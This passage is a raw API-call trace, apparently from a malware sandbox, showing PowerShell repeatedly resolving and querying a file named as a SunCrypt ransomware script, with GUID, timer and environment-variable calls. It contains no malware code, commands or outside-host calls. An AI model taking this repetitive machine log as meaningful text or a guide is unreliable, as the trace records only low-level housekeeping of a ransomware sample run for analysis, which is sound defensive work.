[0098.505] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0098.505] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0098.505] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0098.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0098.505] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0098.505] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0098.507] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701132382396) returned 1 [0098.507] EtwEventActivityIdControl () returned 0x0 [0098.507] EtwEventActivityIdControl () returned 0x0 [0098.507] EtwEventActivityIdControl () returned 0x0 [0098.508] EtwEventActivityIdControl () returned 0x0 [0098.508] CoCreateGuid (in: pguid=0x4ebf0c0 | out: pguid=0x4ebf0c0*(Data1=0xa0044f9, Data2=0xc649, Data3=0x4034, Data4=([0]=0xbd, [1]=0x30, [2]=0x7e, [3]=0x16, [4]=0x5c, [5]=0x3b, [6]=0xeb, [7]=0xcc))) returned 0x0 [0098.508] CoTaskMemAlloc (cb=0x2cc) returned 0x4272d90 [0098.508] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4272d90, nSize=0x164 | out: lpBuffer="") returned 0x0 [0098.509] CoTaskMemFree (pv=0x4272d90) [0098.509] EtwEventActivityIdControl () returned 0x0 [0098.509] EtwEventActivityIdControl () returned 0x0 [0098.509] EtwEventActivityIdControl () returned 0x0 [0098.509] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebec44 | out: lpPerformanceCount=0x4ebec44*=1701132588110) returned 1 [0098.509] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0098.509] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0098.509] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe930) returned 1 [0098.510] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebebf4 | out: lpFileInformation=0x4ebebf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0098.510] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe92c) returned 1 [0098.510] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0098.510] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0098.515] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebec0c | out: lpPerformanceCount=0x4ebec0c*=1701133140746) returned 1 [0098.515] EtwEventActivityIdControl () returned 0x0 [0099.129] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xfa31722c, Data2=0xaa9e, Data3=0x41a0, Data4=([0]=0x98, [1]=0x4b, [2]=0x48, [3]=0x8, [4]=0x19, [5]=0x7, [6]=0xe1, [7]=0x10))) returned 0x0 [0099.129] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0099.129] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0099.129] CoTaskMemFree (pv=0x427a048) [0099.129] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701194599303) returned 1 [0099.129] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0099.130] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0099.130] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0099.130] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0099.130] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0099.130] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0099.130] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0099.132] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701195041852) returned 1 [0099.134] EtwEventActivityIdControl () returned 0x0 [0099.134] EtwEventActivityIdControl () returned 0x0 [0099.135] EtwEventActivityIdControl () returned 0x0 [0099.138] CoCreateGuid (in: pguid=0x4ebecf8 | out: pguid=0x4ebecf8*(Data1=0x589486fb, Data2=0xe31c, Data3=0x43e0, Data4=([0]=0x99, [1]=0x19, [2]=0xc7, [3]=0x87, [4]=0x7c, [5]=0x82, [6]=0xc9, [7]=0x6b))) returned 0x0 [0099.139] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0099.139] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0099.139] CoTaskMemFree (pv=0x427a048) [0099.140] EtwEventActivityIdControl () returned 0x0 [0099.140] EtwEventActivityIdControl () returned 0x0 [0099.140] EtwEventActivityIdControl () returned 0x0 [0099.141] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebe87c | out: lpPerformanceCount=0x4ebe87c*=1701195744664) returned 1 [0099.141] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0099.141] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0099.141] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe568) returned 1 [0099.141] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebe82c | out: lpFileInformation=0x4ebe82c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0099.141] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe564) returned 1 [0099.141] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0099.142] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0099.147] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebe844 | out: lpPerformanceCount=0x4ebe844*=1701196348801) returned 1 [0099.209] EtwEventActivityIdControl () returned 0x0 [0099.324] EtwEventActivityIdControl () returned 0x0 [0099.324] EtwEventActivityIdControl () returned 0x0 [0099.324] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xa1e5d89c, Data2=0xdcb3, Data3=0x44b7, Data4=([0]=0x9a, [1]=0xe4, [2]=0xc8, [3]=0xbf, [4]=0xa6, [5]=0x9c, [6]=0xc5, [7]=0xf))) returned 0x0 [0099.324] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0099.324] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0099.324] CoTaskMemFree (pv=0x427a048) [0099.324] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701214094015) returned 1 [0099.324] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0099.324] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0099.325] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0099.325] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0099.325] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0099.325] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0099.325] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0099.327] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701214374873) returned 1 [0099.327] EtwEventActivityIdControl () returned 0x0 [0099.327] EtwEventActivityIdControl () returned 0x0 [0099.327] EtwEventActivityIdControl () returned 0x0 [0099.328] CoCreateGuid (in: pguid=0x4ebecf8 | out: pguid=0x4ebecf8*(Data1=0xd7f656f4, Data2=0x611, Data3=0x4899, Data4=([0]=0x99, [1]=0x3c, [2]=0x4d, [3]=0x6b, [4]=0x81, [5]=0x5c, [6]=0x2c, [7]=0x83))) returned 0x0 [0099.328] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0099.328] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0099.328] CoTaskMemFree (pv=0x427a048) [0099.329] EtwEventActivityIdControl () returned 0x0 [0099.329] EtwEventActivityIdControl () returned 0x0 [0099.329] EtwEventActivityIdControl () returned 0x0 [0099.329] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebe87c | out: lpPerformanceCount=0x4ebe87c*=1701214581675) returned 1 [0099.329] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0099.329] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0099.329] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe568) returned 1 [0099.329] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebe82c | out: lpFileInformation=0x4ebe82c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0099.330] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe564) returned 1 [0099.330] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0099.330] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0099.332] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebe844 | out: lpPerformanceCount=0x4ebe844*=1701214849092) returned 1 [0099.427] EtwEventActivityIdControl () returned 0x0 [0099.542] EtwEventActivityIdControl () returned 0x0 [0099.542] EtwEventActivityIdControl () returned 0x0 [0099.943] CoCreateGuid (in: pguid=0x4ebf0c0 | out: pguid=0x4ebf0c0*(Data1=0x3c5747ee, Data2=0x8568, Data3=0x485e, Data4=([0]=0x96, [1]=0x1c, [2]=0x8, [3]=0x1d, [4]=0x2f, [5]=0xff, [6]=0x6, [7]=0x4a))) returned 0x0 [0099.943] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0099.943] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0099.943] CoTaskMemFree (pv=0x427a048) [0099.943] EtwEventActivityIdControl () returned 0x0 [0099.943] EtwEventActivityIdControl () returned 0x0 [0099.944] EtwEventActivityIdControl () returned 0x0 [0099.944] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebec44 | out: lpPerformanceCount=0x4ebec44*=1701276066197) returned 1 [0099.944] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0099.944] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0099.944] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe930) returned 1 [0099.944] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebebf4 | out: lpFileInformation=0x4ebebf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0099.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe92c) returned 1 [0099.945] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0099.945] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0099.949] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebec0c | out: lpPerformanceCount=0x4ebec0c*=1701276603465) returned 1 [0100.191] EtwEventActivityIdControl () returned 0x0 [0100.438] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x76c08305, Data2=0x80be, Data3=0x492b, Data4=([0]=0xb9, [1]=0xeb, [2]=0xc0, [3]=0x73, [4]=0xb, [5]=0xc1, [6]=0x2b, [7]=0x6a))) returned 0x0 [0100.439] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0100.439] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0100.439] CoTaskMemFree (pv=0x427a048) [0100.439] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701325591591) returned 1 [0100.439] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.439] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.440] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0100.440] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0100.440] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0100.440] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.440] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.442] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701325848758) returned 1 [0100.442] EtwEventActivityIdControl () returned 0x0 [0100.442] EtwEventActivityIdControl () returned 0x0 [0100.442] EtwEventActivityIdControl () returned 0x0 [0100.442] EtwEventActivityIdControl () returned 0x0 [0100.443] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xb2599af3, Data2=0x5aab, Data3=0x48dc, Data4=([0]=0xb2, [1]=0x54, [2]=0x3, [3]=0xb2, [4]=0xd9, [5]=0x55, [6]=0x91, [7]=0xf9))) returned 0x0 [0100.443] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0100.443] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0100.443] CoTaskMemFree (pv=0x427a048) [0100.443] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701326001475) returned 1 [0100.443] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.444] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.444] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0100.444] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0100.444] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0100.444] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.444] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.446] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701326275819) returned 1 [0100.446] EtwEventActivityIdControl () returned 0x0 [0100.446] EtwEventActivityIdControl () returned 0x0 [0100.446] EtwEventActivityIdControl () returned 0x0 [0100.447] EtwEventActivityIdControl () returned 0x0 [0100.447] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xbfc4a7db, Data2=0x476b, Data3=0x4b5b, Data4=([0]=0x89, [1]=0xe5, [2]=0xec, [3]=0xe7, [4]=0x2d, [5]=0x2, [6]=0x83, [7]=0x4d))) returned 0x0 [0100.447] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0100.447] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0100.447] CoTaskMemFree (pv=0x427a048) [0100.448] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701326411965) returned 1 [0100.448] 